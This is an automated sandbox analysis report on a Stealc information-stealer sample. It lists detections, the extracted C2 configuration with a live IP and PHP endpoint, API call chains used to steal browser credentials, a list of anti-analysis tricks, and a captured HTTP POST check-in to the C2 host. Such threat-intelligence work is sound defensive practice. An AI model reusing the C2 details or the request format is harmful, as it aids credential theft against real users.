Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561486
MD5: 0537afac70b6fbc5a47749caf7565b78
SHA1: 8ec7e7c48823c50e4c4ee6b6cd5c007ef964cad8
SHA256: cc1ee7d61921fed5338f55fc6e9a0661cb78fb562e54280aec23be3adca5e73a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0537AFAC70B6FBC5A47749CAF7565B78)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration: {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1351848119.00000000010CD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1295699560.0000000005130000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7404 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7404 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-23T14:47:16.566594+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49702 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php?= | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpS= | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php_= | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpK= | Avira URL Cloud: Label: malware
Source: file.exe.7404.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_009B4C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_009D40B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_009B60D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 0_2_009C6960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat | 0_2_009BEA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9B80 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_009B9B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_009B9B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy | 0_2_009C6B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_009B7750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_009C18A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009C3910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_009CE210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009C1250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009C1269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009BDB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA | 0_2_009C2390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009BDB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_009C23A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_009CCBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009C4B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_009C4B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose | 0_2_009CD530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy | 0_2_009CDD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA | 0_2_009B16B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose | 0_2_009B16A0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 33 37 43 32 35 30 44 34 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a | Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="hwid"6137C250D41F1622379703------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="build"mars------BKEHDGDGHCBGCAKFIIIE--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy | 0_2_009B4C50
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 33 37 43 32 35 30 44 34 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a | Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="hwid"6137C250D41F1622379703------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="build"mars------BKEHDGDGHCBGCAKFIIIE--
Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/B
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?=
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK=
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS=
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_=
Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phps
Source: file.exe, 00000000.00000002.1351848119.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/q
Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206qM
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop | 0_2_009B9770

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D48B0 | 0_2_009D48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CAB864 | 0_2_00CAB864
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6C1FE | 0_2_00D6C1FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0D192 | 0_2_00C0D192
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7B151 | 0_2_00D7B151
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D50970 | 0_2_00D50970
